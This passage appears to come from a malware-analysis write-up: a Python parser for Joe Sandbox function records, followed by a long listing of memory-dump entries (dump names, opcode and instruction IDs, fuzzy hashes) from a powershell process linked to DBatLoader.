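# <process>.<dump>.<id>.<base>.<undecoded fields>.sdmp, Offset: <base>, based on PE: <bool>
SOURCE_RE = re.compile(
    r"^(?P<proc>\d{8})\.(?P<dump>\d{8})\.(?P<uid>\d+)\.(?P<base>[0-9A-Fa-f]{16})"
    r"\.(?P<rest>[0-9A-Fa-f.]+)\.sdmp, Offset: (?P<offset>[0-9A-Fa-f]+), "
    r"based on PE: (?P<pe>true|false)$"
)


@dataclass(frozen=True)
class FuncRecord:
    process_index: int   # first .sdmp field; matches the "_7_" in the snapshot name
    dump_index: int      # second .sdmp field
    base: int            # region base from the .sdmp name, checked against "Offset:"
    based_on_pe: bool
    snapshot: str
    api_id: str          # empty when no API call was resolved in the function
    string_id: str
    opcode_id: str
    instruction_id: str
    opcode_fuzzy: str
    instruction_fuzzy: str


def parse_records(text):
    """Split the listing into records; each one starts at 'Memory Dump Source'."""
    blocks, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            if cur is not None:
                blocks.append(cur)
            cur = {}
        elif cur is not None and line.startswith(("•", "-", "*")):
            key, _, value = line.lstrip("•-* ").partition(":")
            cur[key.strip()] = value.strip()
    if cur is not None:
        blocks.append(cur)
    return [_build(b) for b in blocks]


def _build(fields):
    m = SOURCE_RE.match(fields.get("Source File", ""))
    if m is None:
        raise ValueError("unrecognised Source File: %r" % fields.get("Source File"))
    base, offset = int(m["base"], 16), int(m["offset"], 16)
    if base != offset:
        raise ValueError("dump name base %#x disagrees with Offset %#x" % (base, offset))
    return FuncRecord(
        process_index=int(m["proc"]), dump_index=int(m["dump"]), base=base,
        based_on_pe=(m["pe"] == "true"), snapshot=fields.get("Snapshot File", ""),
        api_id=fields.get("API ID", ""), string_id=fields.get("String ID", ""),
        opcode_id=fields.get("Opcode ID", ""), instruction_id=fields.get("Instruction ID", ""),
        opcode_fuzzy=fields.get("Opcode Fuzzy Hash", ""),
        instruction_fuzzy=fields.get("Instruction Fuzzy Hash", ""),
    )


def triage(records):
    """Group functions by (process, dump); map API IDs to the Opcode ID that calls them."""
    by_dump = defaultdict(list)
    for r in records:
        by_dump[(r.process_index, r.snapshot)].append(r)
    api_calls = {r.api_id: r.opcode_id for r in records if r.api_id}
    # In this report every Opcode Fuzzy Hash equals its Opcode ID; flag any record where it does not.
    inconsistent = [r.opcode_id for r in records if r.opcode_fuzzy != r.opcode_id]
    return dict(by_dump), api_calls, inconsistent


if __name__ == "__main__":
    groups, apis, bad = triage(parse_records(SAMPLE))
    for (proc, snap), rs in groups.items():
        print("process %d %s: %d function(s)" % (proc, snap, len(rs)))
    print("API-calling functions:", apis)
    print("opcode/fuzzy mismatches:", bad)
```

Run it directly to print the per-dump summary; for a whole report, replace SAMPLE with the full function listing. The Opcode ID and Instruction Fuzzy Hash under "Similarity" are the values to carry into other reports: a function with the same Opcode ID in another sample is the same code, which is how the two SetThreadToken functions here (8f80a01 and 8f80a08, different Opcode IDs, same API ID) can be tracked across DBatLoader builds.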
Control-flow Graph (legend: Executed / Not Executed)

  8f80a08-8f80a77 (calls SetThreadToken) -> 8f80a79-8f80a7f, 8f80a80-8f80a9d
  8f80a79-8f80a7f -> 8f80a80-8f80a9d
APIs: SetThreadToken
Memory Dump Source
• Source File: 00000007.00000002.23033692188.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_8f80000_powershell.jbxd
Similarity
• API ID: ThreadToken
• String ID:
• API String ID: 3254676861-0
• Opcode ID: 29ba848327d779c4bc9e6725f72a3095cde38dc9306cbeec996472068ddb5f64
• Instruction ID: e44aaab82c5d1a7240aaf8405c004d618b3646ac2963d84a5e7f0991175570b8
• Opcode Fuzzy Hash: 29ba848327d779c4bc9e6725f72a3095cde38dc9306cbeec996472068ddb5f64
• Instruction Fuzzy Hash: 0311F5B1A007488FDB10DF9AC885BDEFBF8EB88224F24841AD459A7310D774A944CFA5

                                                                                                                                        Control-flow Graph

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (&\r
                                                                                                                                        • API String ID: 0-3490144471
                                                                                                                                        • Opcode ID: 26a5337a7f7362f9f93221f0c1ff9f3d1a81c9a1607d9cd12861d0e281a39425
                                                                                                                                        • Instruction ID: 0de343a9b00831927f6353255521d3f64a4338a5705914cc0d0425262c73c665
                                                                                                                                        • Opcode Fuzzy Hash: 26a5337a7f7362f9f93221f0c1ff9f3d1a81c9a1607d9cd12861d0e281a39425
                                                                                                                                        • Instruction Fuzzy Hash: 9421AE71E042488FDB10DBADD8447DEBBF5EB89320F14842ED409E7340CA749944CBE5

                                                                                                                                        Control-flow Graph

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4620d5275a714d30e1c4284bcd9e4a40c142270f7a379b41ff66baf5a873f97f
                                                                                                                                        • Instruction ID: f04c3987b16f6dcc53d1d80210e2d1ad086396dc43dfec9ca09bf87ce093c9ad
                                                                                                                                        • Opcode Fuzzy Hash: 4620d5275a714d30e1c4284bcd9e4a40c142270f7a379b41ff66baf5a873f97f
                                                                                                                                        • Instruction Fuzzy Hash: BD713331E002599FDB51DFA9C8946DDBBF2BF89310F14826DE409AB351EB30A985CF91

                                                                                                                                        Control-flow Graph

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4dd25b1f0cc87e1430bef88ab53c5dbeeff01e8a5956ec7f3293d0c8c99475b3
                                                                                                                                        • Instruction ID: ede2aab816ef39ad5708d83a6a291af040bc4e8c8279c99492274e4329c6e482
                                                                                                                                        • Opcode Fuzzy Hash: 4dd25b1f0cc87e1430bef88ab53c5dbeeff01e8a5956ec7f3293d0c8c99475b3
                                                                                                                                        • Instruction Fuzzy Hash: 5F610231E002199FDB54DFA9C89469DBBF2FF89310F14816ED819AB351EB30A985CF91

                                                                                                                                        Control-flow Graph

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4d74437768fb07132afa395fb95304b1ed67aa63b0855a764bfcf4bda32e95d3
                                                                                                                                        • Instruction ID: a6e3f8f9a47b22eaecb6977eda03b693e6a0bc217b547c3c4084df8ea9544b08
                                                                                                                                        • Opcode Fuzzy Hash: 4d74437768fb07132afa395fb95304b1ed67aa63b0855a764bfcf4bda32e95d3
                                                                                                                                        • Instruction Fuzzy Hash: 5F61F671E01208DFDB54DFA9D99979DBBF1EF88320F14812AE809AB354DB30AD41CB61

                                                                                                                                        Control-flow Graph

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1ca39cc8f485cc905db297ba7b19ddcab7e3bdf5735151110b9a8f4e8dda6656
                                                                                                                                        • Instruction ID: b85bdc1cf427f5bbd36cead47ab642ad7d6fb4fef30a0027dffd718a68744bc8
                                                                                                                                        • Opcode Fuzzy Hash: 1ca39cc8f485cc905db297ba7b19ddcab7e3bdf5735151110b9a8f4e8dda6656
                                                                                                                                        • Instruction Fuzzy Hash: BA512871E01248DFDB54DFA9D99969DBBF1EF88320F14802EE809AB355DB30AD41CB61

                                                                                                                                        Control-flow Graph

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 304320f6f1936259991467b433d96c8be152ed68a20d20a5951fd1cfdaeb219e
                                                                                                                                        • Instruction ID: 0d3504fbb3d06eac22a1ebefeb9745f75d479733ab4801941fcdbdae2f1ed024
                                                                                                                                        • Opcode Fuzzy Hash: 304320f6f1936259991467b433d96c8be152ed68a20d20a5951fd1cfdaeb219e
                                                                                                                                        • Instruction Fuzzy Hash: D441FDF1A00241DFDB258F58C5506BA7BF29F89690F1989AAD8049F292C731DC45CBA3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e2c3d592f86132e19cdd953c7931fc75f604903fbfb4d88c91c47bdec24f70da
                                                                                                                                        • Instruction ID: 100a20c32979bb35a94076c10fbf8211ed93be8e42f2890a50a9969f601ddc2f
                                                                                                                                        • Opcode Fuzzy Hash: e2c3d592f86132e19cdd953c7931fc75f604903fbfb4d88c91c47bdec24f70da
                                                                                                                                        • Instruction Fuzzy Hash: 17410A72A00209AFDF419FD9CC44AEEBFB6FF48314F144419E615A7220C7369961DFA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 33fcc134069ee3c5818c8ff282f0fabf06184f93eb0fadee9df09acb3d296e36
                                                                                                                                        • Instruction ID: 1ff35eeaf064ffe9e13080c8870b9e918156b1f4fcc38f6835fc9ea3bcb33b1d
                                                                                                                                        • Opcode Fuzzy Hash: 33fcc134069ee3c5818c8ff282f0fabf06184f93eb0fadee9df09acb3d296e36
                                                                                                                                        • Instruction Fuzzy Hash: 9841F771D007589FEB54CF9AC9A4A9DBBF6FF48320F24812ED818AB214D734A944CF90
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f9438e2296ecd512b1ba286050a870a5a31ec2f275ea60b5c04d07f307b06730
• Instruction ID: 1570debb35e5beb0a5cd7178cf6e4705cbe731bd4571f6847896e67fdd905a5e
• Opcode Fuzzy Hash: f9438e2296ecd512b1ba286050a870a5a31ec2f275ea60b5c04d07f307b06730
• Instruction Fuzzy Hash: 03410771D003589FEB50DFA9C9A4A9DFBB6FF48310F24816ED418AB254D730A945CF90
Memory Dump Source
• Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fe3bfb42fa9ca6071da3dea3a50d4050fae8fba1fdb3b5c5a9abd9d86769e990
• Instruction ID: 779686c82d1c00098f42bd2389577819dc0b518d1de6f7e0497e7602436ef807
• Opcode Fuzzy Hash: fe3bfb42fa9ca6071da3dea3a50d4050fae8fba1fdb3b5c5a9abd9d86769e990
• Instruction Fuzzy Hash: 46315C30E012099FDB85EFB9D4587AEBBF2AF89310F14806DD405EB354EB748841CB91
Memory Dump Source
• Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 092f30947284fbdfe24a3db7ae849606197567ba47649d4e2e01657fd2a6e9f4
• Instruction ID: 568108d41b1589ccff377bf5256d6a28c20e57ef2452cf9d0f812141e33b87bd
• Opcode Fuzzy Hash: 092f30947284fbdfe24a3db7ae849606197567ba47649d4e2e01657fd2a6e9f4
• Instruction Fuzzy Hash: D7314B70E002099FDB84EFA9D4587AEBAF6AF89321F14802DE405EB354EB748C418B90
Memory Dump Source
• Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2a48f1bac0841543a5c8e4b8018f6a007ea19b93d86d117c00cc2568840e7349
• Instruction ID: f1361135423992b28e68eedfa4775a80746dffee360324a0e93b7872a31c3d5b
• Opcode Fuzzy Hash: 2a48f1bac0841543a5c8e4b8018f6a007ea19b93d86d117c00cc2568840e7349
• Instruction Fuzzy Hash: 3F315E71E00209CFEB94DFAAD945BEEBBF1AF49324F14842CD005B7290DB749945CB90
Memory Dump Source
• Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2a2c3cd87dcd21192bdc0fc33ec197c6a022195274ed710da6dddec0903c39c3
• Instruction ID: 97d9e3227d32aba578471e88e9354261fdff6f8a628b7ae21d231cb1191299cd
• Opcode Fuzzy Hash: 2a2c3cd87dcd21192bdc0fc33ec197c6a022195274ed710da6dddec0903c39c3
• Instruction Fuzzy Hash: F431A1B4A002049FEB44EFB8D498AFE7BB2EF84300F1084ADD515AB391DA39AD01CF51
Memory Dump Source
• Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2f0c7a8b1f038538a397695541eabf52b519677ad039bbccb215d30b34b895bd
• Instruction ID: 5932b07813f5b04638c1a026518b0e5a0faa2c560931acba57e122c83d22b0a0
• Opcode Fuzzy Hash: 2f0c7a8b1f038538a397695541eabf52b519677ad039bbccb215d30b34b895bd
• Instruction Fuzzy Hash: 8F316E30E012089FDB44DFA8D994BEEBBF2AF48324F14406DE405AB391DB319D01CB90
Memory Dump Source
• Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c991e3b0325eb8df3ede7630b445cd389550ee9b98ccec7500d99d7efbcc0e49
• Instruction ID: 23ea6131ece6b3d9e6d3974aa5db2c33319a73c3ee2580ce83f6d18f5b7ea120
• Opcode Fuzzy Hash: c991e3b0325eb8df3ede7630b445cd389550ee9b98ccec7500d99d7efbcc0e49
• Instruction Fuzzy Hash: 2C316D71900749DFEB60CF99C885BEEBFB4EF99724F24810DE9146B280C375A594CBA1
Memory Dump Source
• Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4a0619ab1b4c206268fa706675cb2cf0584f79926da0964b0097336caeb247a7
• Instruction ID: 6824b527e0c955e5b47998d3b5f35803074910c6ac9199cf79471668a44b8098
• Opcode Fuzzy Hash: 4a0619ab1b4c206268fa706675cb2cf0584f79926da0964b0097336caeb247a7
• Instruction Fuzzy Hash: 30316D30E012089FDB44DFA8D595BAEBBF2EF88320F14802DE405A7395DA359D01CBA0
Memory Dump Source
• Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 335d908f4a6465be7483006bdd093ac976749f003170f350a8d89032cc55c819
• Instruction ID: 01328a158117016adb58e37b3d4f2b3fc6ae7ed8324e2fd79f13b213feb0fac6
• Opcode Fuzzy Hash: 335d908f4a6465be7483006bdd093ac976749f003170f350a8d89032cc55c819
• Instruction Fuzzy Hash: 623151B4A002059FEB44EFA8D898AFE77B6EF84304F10847DD515AB394DA39AD418F91
Memory Dump Source
• Source File: 00000007.00000002.23005970295.00000000047CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 047CD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_47cd000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fe4576eb717e09503a429be7be2dde62d73173719086021c408f8a512df0c9d7
• Instruction ID: 03341e9f56a56448b7d27f4bc7198e685171268250737e0e3c18133dc7758685
• Opcode Fuzzy Hash: fe4576eb717e09503a429be7be2dde62d73173719086021c408f8a512df0c9d7
• Instruction Fuzzy Hash: DE21D172600300EFDB05CF54D9C0B26BB66FB88314F24C5ADE8094A396C73AE556DBA2
Memory Dump Source
• Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2a3a35e57e9eadae4e30149d574de59369dcde703356182997c23e61943b1984
• Instruction ID: 7ec9290e7d31db709e6139bae71d68ef18c7dbd59b3f728b0be2f6b863d9cf1f
• Opcode Fuzzy Hash: 2a3a35e57e9eadae4e30149d574de59369dcde703356182997c23e61943b1984
• Instruction Fuzzy Hash: 00317EB0D067448EDBA1CF6AC4887DAFFE2EF88320F28C46ED4499B245D6745485CB51
Memory Dump Source
• Source File: 00000007.00000002.23005970295.00000000047CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 047CD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_47cd000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cf9b2d96f3e0276efbb6b33ddf55553c8976941ff590884d408b84592a9b059e
• Instruction ID: 35f836eeb2c0b2dbe667e9f37e975e482fda26386cdc97a82308573a47f5efeb
• Opcode Fuzzy Hash: cf9b2d96f3e0276efbb6b33ddf55553c8976941ff590884d408b84592a9b059e
• Instruction Fuzzy Hash: F2210775604340EFDB14DF24D9C0B26BB66FB84714F24C96ED9094B386C77AE486CA62
Memory Dump Source
• Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cca24cad1f450eeca8904c5c832baffee985409c5f7544836920dc1a1e58b5d0
• Instruction ID: 196030470e437867784c20eb535d8f67acde3c6ad53bbf1412ead20355dafdd2
• Opcode Fuzzy Hash: cca24cad1f450eeca8904c5c832baffee985409c5f7544836920dc1a1e58b5d0
• Instruction Fuzzy Hash: 7C215EB0D057448EEBA0CF6AD4883DAFFF6EB88324F24C41ED45997245D67464818B60
Memory Dump Source
• Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1a9b3423694710971ebb066a69fb53f350e74577684babafd35f5aa4da258023
• Instruction ID: c39d3d36b65aa1cb3b9b9a27f802b11c8a77b60ffab0610a09a9804dea644471
• Opcode Fuzzy Hash: 1a9b3423694710971ebb066a69fb53f350e74577684babafd35f5aa4da258023
• Instruction Fuzzy Hash: 57216871901249DFDB51CF99C884BEEBFB0EB89320F18805EE815AB211C335A995CFA1
Memory Dump Source
• Source File: 00000007.00000002.23027755201.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_77d0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 53822e6ddedac5447c7247308d8be491a851250e587df8bb0b9325b2018b3313
• Instruction ID: b99d9a55a45e3cf9ee4013bfe529d2312e547211126d5bf23ade511d4aa55082
• Opcode Fuzzy Hash: 53822e6ddedac5447c7247308d8be491a851250e587df8bb0b9325b2018b3313
• Instruction Fuzzy Hash: 7D11B2F1A10206DFDB20CF54C641B7ABBF6FB852A0F158476D958A7216D731DC42CBA2
Memory Dump Source
• Source File: 00000007.00000002.23005970295.00000000047CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 047CD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_47cd000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c0dbe3666c315db4003bcf300d929056af031181792ef0f39531343fa7b66129
• Instruction ID: b7a79f460be497e6c8ee8d47bed22c835ee7003bfbcd1113afe970d58333055e
• Opcode Fuzzy Hash: c0dbe3666c315db4003bcf300d929056af031181792ef0f39531343fa7b66129
• Instruction Fuzzy Hash: CC216A76504240DFCB06CF54D9C4B16BB72FB88314F24C5ADE8494A696C33AE56ACB91
Memory Dump Source
• Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 82b250bd1e27aac2c9cb36215757db5f6de846510cde29e70b09672a88661b0c
                                                                                                                                        • Instruction ID: 52ea737c1bcd32b2d3f363ebf82c46e97afab4c145acee2b4c798f4c1ed56712
                                                                                                                                        • Opcode Fuzzy Hash: 82b250bd1e27aac2c9cb36215757db5f6de846510cde29e70b09672a88661b0c
                                                                                                                                        • Instruction Fuzzy Hash: 96116B312087849FD726C7B8D5556697FF4DF46220B0848EEE48ECB7B2CA20BC44C701
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23005970295.00000000047CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 047CD000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_47cd000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 83d3e3f3484f8d166536a233845b01df7966700ac57024a53152c6775b246156
                                                                                                                                        • Instruction ID: b4b5d05e69b8c703205db738169979df61f84ad299381e2e499d4b68b9af628f
                                                                                                                                        • Opcode Fuzzy Hash: 83d3e3f3484f8d166536a233845b01df7966700ac57024a53152c6775b246156
                                                                                                                                        • Instruction Fuzzy Hash: 7311BE75504280CFCB11CF14D5C4B15BF62FB44314F24CAAED8494B796C33AE44ACB52
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23005970295.00000000047CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 047CD000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_47cd000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 04cbb00a2c56f1f0430c04f9e1a21d2425e406ff6ec60ad5cb882b28029b7de1
                                                                                                                                        • Instruction ID: 79973088b8c09b94f13285b4b7fecc9780956b63b8573372043042a63334f902
                                                                                                                                        • Opcode Fuzzy Hash: 04cbb00a2c56f1f0430c04f9e1a21d2425e406ff6ec60ad5cb882b28029b7de1
                                                                                                                                        • Instruction Fuzzy Hash: F40184326043409BE7208F2EDD84766BB98EB41364F18C82EED440B356D279A885C6B1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23005970295.00000000047CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 047CD000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_47cd000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8bd63c5cc369a6db55b62c03d1ef67ab85b266edd87d12d8ff86369066aac47c
                                                                                                                                        • Instruction ID: b1ef613afe2cea2382cd02a1f8e4e20a79050010200155bea4532f7d6ce4b6c9
                                                                                                                                        • Opcode Fuzzy Hash: 8bd63c5cc369a6db55b62c03d1ef67ab85b266edd87d12d8ff86369066aac47c
                                                                                                                                        • Instruction Fuzzy Hash: 1F01216150D3C09ED7128B259C94B62BFA4DF43224F1DC5DFD9848F293C2695848C772
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f7c781bbf941780197b6e120db1c9cb4c6e8e79165b9b563dedff29a683fd312
                                                                                                                                        • Instruction ID: ad3aff0bb33b5c4dd0dc51a3a9cec8fd34fc24bd3a5283f97de0ccdb4c2ab4ae
                                                                                                                                        • Opcode Fuzzy Hash: f7c781bbf941780197b6e120db1c9cb4c6e8e79165b9b563dedff29a683fd312
                                                                                                                                        • Instruction Fuzzy Hash: 1DF0313524E3D11FD3078668D8545D5BF62AF83214F1990FBC254CF3A3CA258C0B83A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23005970295.00000000047CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 047CD000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_47cd000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f08abfa460235c82279eb8cfcd254232cd86f4259b9c60467431a03cc76b6ca5
                                                                                                                                        • Instruction ID: 5d02209212c5556619e32c5ff46efa8d0be9c4ab0f6396587c0bf3c60fb58f8b
                                                                                                                                        • Opcode Fuzzy Hash: f08abfa460235c82279eb8cfcd254232cd86f4259b9c60467431a03cc76b6ca5
                                                                                                                                        • Instruction Fuzzy Hash: FEF0E776600600AF97208F0AD985C26FBE9EBD4770715C56EE84A4B712C671FC42CEA0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000007.00000002.23023795011.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_7_2_6cc0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
